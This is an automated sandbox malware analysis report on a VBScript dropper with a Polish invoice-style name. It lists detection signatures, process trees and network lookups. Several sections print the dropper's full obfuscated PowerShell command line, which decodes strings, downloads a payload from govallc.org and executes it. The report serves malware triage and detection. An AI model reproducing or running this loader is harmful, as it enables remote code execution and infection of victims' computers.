Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs

Overview

General Information

Sample name:MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs
Analysis ID:1533092
MD5:a74cf7fea2f317f537fadc3e2d34dee5
SHA1:1df8410433bba83aa58596cd88a9c084a5a8e43a
SHA256:c0d20c1324c32ec11ee40a892c6ae0b954f6972e19ce9e976bcf565091f12cdd
Tags:vbsuser-Maciej8910871
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
AI detected suspicious sample
Potential evasive VBS script found (sleep loop)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6164 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 812 cmdline: cmd.exe /c ping aszzzw_6777.6777.6777.677e MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 4052 cmdline: ping aszzzw_6777.6777.6777.677e MD5: 2F46799D79D22AC72C241EC0322B011D)
    • powershell.exe (PID: 7344 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svigagtige dimerised Oprettelsesdokumenter Rhinodynia Zetas #>;$Desiringly147='Grunted';<#Iltelegrammet Hemispheral Acromelalgia Deboshed Corruptibleness #>;$Masonically=$Nervepatientens+$host.UI;If ($Masonically) {$Laengst++;}function Jus($Hovekatalogers){$Saneringsmodent=$Skrmplante+$Hovekatalogers.'Length'-$Laengst; for( $Isttes=4;$Isttes -lt $Saneringsmodent;$Isttes+=5){$Skovsvinerier++;$Snrer210+=$Hovekatalogers[$Isttes];$Skuebrdene='Kundemdets';}$Snrer210;}function Hyperromanticism140($Regelfaststtelsers){ & ($Andantinoer) ($Regelfaststtelsers);}$Courtezanry=Jus ' owlMBov.o Unlz R niFluslDiasl AnoaDay /Non. ';$Courtezanry+=Jus ' ad5Thro. Ska0 Adr Dece(Is.aWRotaiInvanRad.dBracoGawaw M,rsFren Ch,pNOndsT,til Rose1Skr,0Ungd. B t0Ig,i;Str ParWNoneiTra nFar,6Krem4S,je; Ber Mot x Ka.6S,at4Ha,l;Cykl BaghrAfstv itr: Hol1 All3 it1 or.Fugl0 ava)Stri FyriGStegeGenocOmgakIgnao rre/As p2Depr0 Mis1calc0 Spo0Penk1side0 Enf1Retr WeapFPropiLaserRemoe,kolfLiv,oBarbxBlu /Unf.1Pol,3 Unf1utrn. mb0Bade ';$Retspraksisens=Jus 'KariU,rivsPhyteLet.rtana-Unfra StygSmmeeBorgNTil TBlac ';$Miljforandringers=Jus 'LegahUnivtenketKloapStats boo:Recu/Ergo/gae,gsolboHyd vFolkaHumel RatlMahocFati.SerpoPaasrPitagBibe/R gnrBegae ird DefnSta iSamfnTo lgEners IndbF rsl.tatt .ydeTr lr idtnM,dheCervs oma.Sou.aAsylsCan iOstr ';$Croises=Jus ' ,kr>Nerv ';$Andantinoer=Jus ' ResIAnamESo iXViva ';$Befogging='Italiana';$Recarbon='\Arkaiserings.Slg';Hyperromanticism140 (Jus 'Forh$ empgPr,clAg eofrueBOms.AM.nolOver:NiveA pidnVagta ispCThyrl DisiFrihsSegriOu,dsKnu,1Vrkb4E gl7,arv=A ab$ s eE.uniNCog VAnt :Ae iaForfpTeraPKer dNoncaConttWienAluge+Arv,$,ambrStteeExcuc issAkontr S,kb MayoWeasNStub ');Hyperromanticism140 (Jus ' hec$DefeG Ln Lr ckONonaB ForaTe.eLBrn :GenoAGrafuAlleT MulOSa.se Co.T SvrtRuboE Bra= P s$UnsoM ShaiEme.LStyrjNulsfAarro M,mrdoryASyndn InbDAnlirSpe,iNasaN KomG VodeyustRInflS Spy.Sprjs xaP SmrlVa dIBisetSub (Well$ PeacJeweRRetso S,di NitsEsseEUpshsSydv)Arb ');Hyperromanticism140 (Jus 'Ndp [Cyc n.ndiEOothT S,j.Ger.sskovEUd frRespvProhI U fCfedteSalvPPhylOSan.i Op.nS.orT antmSpilaFjolN lauaR liGUprue ChoRTuli]W nn:t.ed:Ansts heeBageCisskU MyorHeltI rustUrotyUdviPSc dr.ygaOUndstOro.O CryC idO talLHove Da a=Steg Kaff[H moNBesgETutotBird. ebySGerfEUni CSweauDyserOverIHomoT Picy,efrpLnkorUdstoMaantBiltORomaCafs.oC holCondTKavey KolPRdtue S,e]Tui :Hypo:smalTamucLKo ps N n1Nond2 Dep ');$Miljforandringers=$Autoette[0];$Panspermic=(Jus 'R od$Trepg alaLU.caoElecBEuryaGsteLFisk:spidTBstrEKloasGruntHikkUBeelD FesSUdskKC ieRUdp iSv.jvUalmN Madi CebnStruGPoinSW.ntf TraAfredcVindI mpelgr nIO det Unoe PretMeine.urunAmph=UzbenneoneBolsWSlen- AtmOmaliBCaatjSekaeKr mcAartTDimi .eadS ilYBlabSAfstTAsseeYallM Vrd.TripN Chee Sert ask.assuwTrameWoo.bFodecO chlPeroISp aeUd,anVasotThie ');Hyperromanticism140 ($Panspermic);Hyperromanticism140 (Jus 'Terp$NeksT Gr,eLydssU.ostPotpu OvedStabs supkJuntr SemiGearvMedln icri Skon tupg riss Pasf TilaMisecHemaiStatlpeaciWaistTempeBanktKr.peInexnEvin.U.reHStraeS,orahelmdPluseKanarArvesNyru[Scyl$kallRBetueToi t Ni sTrenpDigirS,igaCr skOl es lluiLinas Mo.esmagnKni.sUnde]Unib= D c$PilaC emaofolluSubvrMuditdisteSk rzRatiaKaninBortrB riylogi ');$Quickwittedness=Jus 'Reto$ VreTJordeNortsUncotUdspulitodFluesRea kJacor B ti MelvDirenInd,iNon,n resgLkkesWin f indamesac Snoitr nlBilliPlebtgenfe PertFasce BranLade.P eaDWal o BhiwVestnPurbl SkioAnsaaTricdPavoFAndriSvinlundeeMil (Ital$kro MAggriStrklKulmjPitcf Ru oViv rIndraO ryn AvldDr,jrPantiOpstnAarpg.erse inor upes Sam,xero$ BadGDiluo kvac SnnaRe drEskit oli2A.ea1Unde9Slvs) For ';$Gocart219=$Anaclisis147;Hyperromanticism140 (Jus ' ff$Epidg Bo lTom o PlabBaj,ARaadLFals:SukksPietuSojabJun.lUnb A.emiPLovlS d,ba HyprBaadYMats= ona(DiviTPutaE.envSG lit Ind-hundPDigraAmelt ElchUnke Ra i$SkipgIngaOOverc,choaScherUdaatGens2 uni1 Sha9 Ce ) Nu. ');while (!$Sublapsary) {Hyperromanticism140 (Jus 'Lo a$Can g.onilmidto Ydeb Ko.akautlTr d:BefjNWin,oen onSen.fTusioC,acc TilaOverl e r= Spe$Fo otOctarEquiuThriemed, ') ;Hyperromanticism140 $Quickwittedness;Hyperromanticism140 (Jus 'BullsFairt StrAF.reRArzaTOpha-TofasGru.LToruECha ERa rpAnn. Lope4 An ');Hyperromanticism140 (Jus ' Reg$Acetg loL R sONoncB RygAObumlhaar:AndeSTesku St BEposLPs.ca MenpUnhaS UdpaL vnREnviy Bac= Emb(So,ttTimbegerisN nptMinu- JivPBilmaSomntBaraHBeda Luk $Tov GTeksoW,pec UndaChe rLa,dT Boy2 Gle1Dejk9Cant)C st ') ;Hyperromanticism140 (Jus ' Whi$DgnkG afnl nsloLatebSvarA Worl Uno:GaloBIntiATwy g ystSPrehV tmmRDiffdAutoS ont=Sklr$ splG Fabl olOScrab ThaaMesilFe n: AmiF Rugh PolOPrevvCouneLledddameeHoicr DraNAcclE ins+Grin+.ava% pti$Espaa lyuGnu T ilobagse ClotRewiTStoreBray.EpigCStoroLatou DisNMemotCirc ') ;$Miljforandringers=$Autoette[$Bagsvrds];}$Turpentiny251=324334;$Oxalsyre=30504;Hyperromanticism140 (Jus 'Ryst$sk pGLydiL DisODistBProsA RetLGuil:,eliTOverotiltg TeerLandEMedlVUnatITrfssId moT umRgg dSEnc plej= A.k MaiG meteBro,TOpio-UncrcAnt.oQui N Kortka kESt,lNSto tpari Ga m$TeleGGenvo Bu C L vaCharr Lret rdi2Inco1 I,f9 Omn ');Hyperromanticism140 (Jus ' Bi $TomagPrecl bllo verbForlaExstl sp :ove T punrminuaThicuFlyvm IntaT.kkt nsaiSlagsUo mqStipxGyrerRo c ,ob=Rota Gale[TotaSToway AnpsUd nt,kateDig mFors.TilrC Homo.ixenScenvhoppe Fo rStubtBra.]axwe: se,:FagkFMajdr Do oDag mOb uB StaaVests ombeLrk 6Pebr4WaspS oystbyudrInfui.rnin QuigSubv( cap$ T.sTChevoFo.vgBewar ,moe ekvvInauiI.nosGed o ElerGaars,cor)Top ');Hyperromanticism140 (Jus ' Vul$D,ttG RoulRe aOReteBOmryAFavolTffe: DiaKDefaOPlseNBio tVal r KonaUndes SphtForusLazy Mano= Ej ,att[einaS relYGnidSWatetSy tEByggMTra .NedttneddeUvenX ablTRe n.IntreTrannBlokcFutuoP pidGieniFinan NedgBrud]Eugl:Wo,k:Frgna etsS,ltcSup,iSquaiSa b.Skurg Shie MelTR.crs Po T RetRBalaILendnA,agGCocc(H ds$Ove tvgtfrPjataIntrUDrnrM,ladaInsttFlueI Uf S utaQR diXHer,rH bn)Sing ');Hyperromanticism140 (Jus ' uns$unexgSuprl.pigoSub.BIn eaMe mLKase:JordbAurei Ag.mParlAnomiNFloga In,= Out$SimuKSowaOStrin TraTDorirA tia O.ts,esttP raSPaas.PerssIndiUK ffbLsagsScantDec.RNatuILambnfortGPr m(B.su$no ctBea,uP tcRSeecpLinjeA ronMiddt.haii SygNSeksyL wn2Forg5Subf1M rm, ye$Met,oB,stXdag AGipslMitosPteryKolorEr.aE For) iro ');Hyperromanticism140 $bimana;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7344JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_7344.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: WScript or CScript Dropper
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs", CommandLine|base64offset|contains: er, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs", ProcessId: 6164, ProcessName: wscript.exe
      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs", CommandLine|base64offset|contains: er, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs", ProcessId: 6164, ProcessName: wscript.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svigagtige dimerised Oprettelsesdokumenter Rhinodynia Zetas #>;$Desiringly147='Grunted';<#Iltelegrammet Hemispheral Acromelalgia Deboshed Corruptibleness #>;$Masonically=$Nervepatientens+$host.UI;If ($Masonically) {$Laengst++;}function Jus($Hovekatalogers){$Saneringsmodent=$Skrmplante+$Hovekatalogers.'Length'-$Laengst; for( $Isttes=4;$Isttes -lt $Saneringsmodent;$Isttes+=5){$Skovsvinerier++;$Snrer210+=$Hovekatalogers[$Isttes];$Skuebrdene='Kundemdets';}$Snrer210;}function Hyperromanticism140($Regelfaststtelsers){ & ($Andantinoer) ($Regelfaststtelsers);}$Courtezanry=Jus ' owlMBov.o Unlz R niFluslDiasl AnoaDay /Non. ';$Courtezanry+=Jus ' ad5Thro. Ska0 Adr Dece(Is.aWRotaiInvanRad.dBracoGawaw M,rsFren Ch,pNOndsT,til Rose1Skr,0Ungd. B t0Ig,i;Str ParWNoneiTra nFar,6Krem4S,je; Ber Mot x Ka.6S,at4Ha,l;Cykl BaghrAfstv itr: Hol1 All3 it1 or.Fugl0 ava)Stri FyriGStegeGenocOmgakIgnao rre/As p2Depr0 Mis1calc0 Spo0Penk1side0 Enf1Retr WeapFPropiLaserRemoe,kolfLiv,oBarbxBlu /Unf.1Pol,3 Unf1utrn. mb0Bade ';$Retspraksisens=Jus 'KariU,rivsPhyteLet.rtana-Unfra StygSmmeeBorgNTil TBlac ';$Miljforandringers=Jus 'LegahUnivtenketKloapStats boo:Recu/Ergo/gae,gsolboHyd vFolkaHumel RatlMahocFati.SerpoPaasrPitagBibe/R gnrBegae ird DefnSta iSamfnTo lgEners IndbF rsl.tatt .ydeTr lr idtnM,dheCervs oma.Sou.aAsylsCan iOstr ';$Croises=Jus ' ,kr>Nerv ';$Andantinoer=Jus ' ResIAnamESo iXViva ';$Befogging='Italiana';$Recarbon='\Arkaiserings.Slg';Hyperromanticism140 (Jus 'Forh$ empgPr,clAg eofrueBOms.AM.nolOver:NiveA pidnVagta ispCThyrl DisiFrihsSegriOu,dsKnu,1Vrkb4E gl7,arv=A ab$ s eE.uniNCog VAnt :Ae iaForfpTeraPKer dNoncaConttWienAluge+Arv,$,ambrStteeExcuc issAkontr S,kb MayoWeasNStub ');Hyperromanticism140 (Jus ' hec$DefeG Ln Lr ckONonaB ForaTe.eLBrn :GenoAGrafuAlleT MulOSa.se Co.T SvrtRuboE Bra= P s$UnsoM ShaiEme.LStyrjNulsfAarro M,mrdoryASyndn InbDAnlirSpe,iNasaN KomG VodeyustRInflS Spy.Sprjs xaP SmrlVa dIBisetSub (Well$ PeacJeweRRetso S,di NitsEsseEUpshsSydv)Arb ');Hyperromanticism140 (Jus 'Ndp [Cyc n.ndiEOothT S,j.Ger.sskovEUd frRespvProhI U fCfedteSalvPPhylOSan.i Op.nS.orT antmSpilaFjolN lauaR liGUprue ChoRTuli]W nn:t.ed:Ansts heeBageCisskU MyorHeltI rustUrotyUdviPSc dr.ygaOUndstOro.O CryC idO talLHove Da a=Steg Kaff[H moNBesgETutotBird. ebySGerfEUni CSweauDyserOverIHomoT Picy,efrpLnkorUdstoMaantBiltORomaCafs.oC holCondTKavey KolPRdtue S,e]Tui :Hypo:smalTamucLKo ps N n1Nond2 Dep ');$Miljforandringers=$Autoette[0];$Panspermic=(Jus 'R od$Trepg alaLU.caoElecBEuryaGsteLFisk:spidTBstrEKloasGruntHikkUBeelD FesSUdskKC ieRUdp iSv.jvUalmN Madi CebnStruGPoinSW.ntf TraAfredcVindI mpelgr nIO det Unoe PretMeine.urunAmph=UzbenneoneBolsWSlen- AtmOmaliBCaatjSekaeKr mcAartTDimi .eadS ilYBlabSAfstTAsseeYallM Vrd.TripN Chee Sert ask.assuwTrameWoo.bFodecO chlPeroISp aeUd,anVasotThie ');Hyperromanticism140 ($Panspermic);Hyperromanticism140 (Jus 'Terp$NeksT Gr,eLydssU.ostPotpu OvedStabs supkJuntr SemiGearvMedln icri Skon

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.8% probability
      Source: Binary string: m.Core.pdb source: powershell.exe, 0000000B.00000002.2571264131.000002A2C4CFC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb@c source: powershell.exe, 0000000B.00000002.2571264131.000002A2C4CCD000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ows\dll\System.pdb source: powershell.exe, 0000000B.00000002.2571264131.000002A2C4CFC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 0000000B.00000002.2571264131.000002A2C4D29000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: *n.pdb source: powershell.exe, 0000000B.00000002.2571264131.000002A2C4D29000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbN source: powershell.exe, 0000000B.00000002.2594834506.000002A2DD294000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000B.00000002.2570430275.000002A2C3142000.00000004.00000020.00020000.00000000.sdmp

      Software Vulnerabilities

      barindex
      Suspicious execution chain found
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

      Networking

      barindex
      Uses ping.exe to check the status of other devices and networks
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping aszzzw_6777.6777.6777.677e
      Source: unknownDNS traffic detected: query: aszzzw_6777.6777.6777.677e replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: govallc.org replaycode: Name error (3)
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: aszzzw_6777.6777.6777.677e
      Source: global trafficDNS traffic detected: DNS query: govallc.org
      Source: powershell.exe, 0000000B.00000002.2591792743.000002A2D4F76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2591792743.000002A2D4E34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 0000000B.00000002.2571576679.000002A2C4FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 0000000B.00000002.2571576679.000002A2C4DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 0000000B.00000002.2571576679.000002A2C4FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 0000000B.00000002.2571576679.000002A2C4DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 0000000B.00000002.2591792743.000002A2D4E34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 0000000B.00000002.2591792743.000002A2D4E34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 0000000B.00000002.2591792743.000002A2D4E34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 0000000B.00000002.2571576679.000002A2C4FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 0000000B.00000002.2571576679.000002A2C6598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5C93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5F40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C56A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C6514000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C6360000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C66B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C6774000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5A10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5D57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C4FE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C543F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C63FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C65E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C69B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C52F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C6813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5E3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://govallc.org
      Source: powershell.exe, 0000000B.00000002.2571576679.000002A2C4FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://govallc.org/redningsblternes.asiP
      Source: powershell.exe, 0000000B.00000002.2591792743.000002A2D4F76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2591792743.000002A2D4E34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

      System Summary

      barindex
      Windows Scripting host queries suspicious COM object (likely to drop second stage)
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Wscript starts Powershell (via cmd or directly)
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping aszzzw_6777.6777.6777.677e
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svigagtige dimerised Oprettelsesdokumenter Rhinodynia Zetas #>;$Desiringly147='Grunted';<#Iltelegrammet Hemispheral Acromelalgia Deboshed Corruptibleness #>;$Masonically=$Nervepatientens+$host.UI;If ($Masonically) {$Laengst++;}function Jus($Hovekatalogers){$Saneringsmodent=$Skrmplante+$Hovekatalogers.'Length'-$Laengst; for( $Isttes=4;$Isttes -lt $Saneringsmodent;$Isttes+=5){$Skovsvinerier++;$Snrer210+=$Hovekatalogers[$Isttes];$Skuebrdene='Kundemdets';}$Snrer210;}function Hyperromanticism140($Regelfaststtelsers){ & ($Andantinoer) ($Regelfaststtelsers);}$Courtezanry=Jus ' owlMBov.o Unlz R niFluslDiasl AnoaDay /Non. ';$Courtezanry+=Jus ' ad5Thro. Ska0 Adr Dece(Is.aWRotaiInvanRad.dBracoGawaw M,rsFren Ch,pNOndsT,til Rose1Skr,0Ungd. B t0Ig,i;Str ParWNoneiTra nFar,6Krem4S,je; Ber Mot x Ka.6S,at4Ha,l;Cykl BaghrAfstv itr: Hol1 All3 it1 or.Fugl0 ava)Stri FyriGStegeGenocOmgakIgnao rre/As p2Depr0 Mis1calc0 Spo0Penk1side0 Enf1Retr WeapFPropiLaserRemoe,kolfLiv,oBarbxBlu /Unf.1Pol,3 Unf1utrn. mb0Bade ';$Retspraksisens=Jus 'KariU,rivsPhyteLet.rtana-Unfra StygSmmeeBorgNTil TBlac ';$Miljforandringers=Jus 'LegahUnivtenketKloapStats boo:Recu/Ergo/gae,gsolboHyd vFolkaHumel RatlMahocFati.SerpoPaasrPitagBibe/R gnrBegae ird DefnSta iSamfnTo lgEners IndbF rsl.tatt .ydeTr lr idtnM,dheCervs oma.Sou.aAsylsCan iOstr ';$Croises=Jus ' ,kr>Nerv ';$Andantinoer=Jus ' ResIAnamESo iXViva ';$Befogging='Italiana';$Recarbon='\Arkaiserings.Slg';Hyperromanticism140 (Jus 'Forh$ empgPr,clAg eofrueBOms.AM.nolOver:NiveA pidnVagta ispCThyrl DisiFrihsSegriOu,dsKnu,1Vrkb4E gl7,arv=A ab$ s eE.uniNCog VAnt :Ae iaForfpTeraPKer dNoncaConttWienAluge+Arv,$,ambrStteeExcuc issAkontr S,kb MayoWeasNStub ');Hyperromanticism140 (Jus ' hec$DefeG Ln Lr ckONonaB ForaTe.eLBrn :GenoAGrafuAlleT MulOSa.se Co.T SvrtRuboE Bra= P s$UnsoM ShaiEme.LStyrjNulsfAarro M,mrdoryASyndn InbDAnlirSpe,iNasaN KomG VodeyustRInflS Spy.Sprjs xaP SmrlVa dIBisetSub (Well$ PeacJeweRRetso S,di NitsEsseEUpshsSydv)Arb ');Hyperromanticism140 (Jus 'Ndp [Cyc n.ndiEOothT S,j.Ger.sskovEUd frRespvProhI U fCfedteSalvPPhylOSan.i Op.nS.orT antmSpilaFjolN lauaR liGUprue ChoRTuli]W nn:t.ed:Ansts heeBageCisskU MyorHeltI rustUrotyUdviPSc dr.ygaOUndstOro.O CryC idO talLHove Da a=Steg Kaff[H moNBesgETutotBird. ebySGerfEUni CSweauDyserOverIHomoT Picy,efrpLnkorUdstoMaantBiltORomaCafs.oC holCondTKavey KolPRdtue S,e]Tui :Hypo:smalTamucLKo ps N n1Nond2 Dep ');$Miljforandringers=$Autoette[0];$Panspermic=(Jus 'R od$Trepg alaLU.caoElecBEuryaGsteLFisk:spidTBstrEKloasGruntHikkUBeelD FesSUdskKC ieRUdp iSv.jvUalmN Madi CebnStruGPoinSW.ntf TraAfredcVindI mpelgr nIO det Unoe PretMeine.urunAmph=UzbenneoneBolsWSlen- AtmOmaliBCaatjSekaeKr mcAartTDimi .eadS ilYBlabSAfstTAsseeYallM Vrd.TripN Chee Sert ask.assuwTrameWoo.bFodecO chlPeroISp aeUd,anVasotThie ');Hyperromanticism140 ($Panspermic);Hyperromanticism140 (Jus 'Terp$NeksT Gr,eLydss
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping aszzzw_6777.6777.6777.677eJump to behavior
